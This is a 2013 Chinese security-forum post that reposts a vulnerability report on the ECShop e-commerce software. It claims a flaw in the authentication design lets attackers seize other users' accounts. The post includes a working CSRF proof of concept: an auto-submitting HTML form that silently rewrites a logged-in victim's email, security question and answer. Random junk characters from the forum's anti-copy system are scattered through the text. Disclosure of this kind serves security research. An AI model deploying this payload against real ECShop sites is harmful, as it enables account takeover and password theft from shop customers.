找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1957|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:6 J2 \8 |1 Y* C* z
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
0 a: x6 n/ p3 ^! x2 ?
* d( Y$ O4 R' l9 r: i) ]- D1 JDemo For:http://www.wooyun.org/bug.php?action=view&id=395+ ?$ N/ L0 K7 [* b

  n0 t. ?$ @- }5 X7 g0 e) c, h详细说明:
0 Z: Z! \( N; b# z; n* B利用csrf和xss可以突破官方所说的“障碍”9 u' I1 f0 T. x
xss版本已经有人说明
, I  h  d+ i4 f9 a/ r9 \0 h; i这里给出csrf版本
4 M* m5 g- B5 U, _0 M3 g& }6 R, b3 v+ I3 a6 L" T9 z
漏洞证明:" |+ d( ~! O, B- p
<html>8 p& s3 F$ z8 d/ Q( A( N
<body>
  K3 {+ k8 v6 K1 O) ]4 J<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
$ y  d# A/ p+ ^<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
3 Y# i* j9 w2 Q- z( G<INPUT TYPE="text" NAME="act" value="act_edit_profile">
$ }: k9 s( [: @' }. o" c<INPUT TYPE="text" NAME="sel_question" value="ecshop">
) \3 O' H& A% ]. x<INPUT TYPE="text" NAME="passwd_answer" value="exploit">6 {4 I) T, Z3 Q7 e6 \
</body>
/ u1 h  T* |5 p5 i- k# B; f9 d. d2 {<script>0 n3 p6 E5 d5 Z1 T5 P3 Z0 J5 k
document.forms[0].submit();# e' y9 [* Y0 i
</script>( p6 c# ~3 u3 y& C9 E$ Z
</html>
; y4 Q0 S  |4 V+ @% T' a& b( D构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
5 v3 o: s, t3 Z' \+ u+ j" s0 d, k$ E( @. L( P9 J) J8 W9 Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表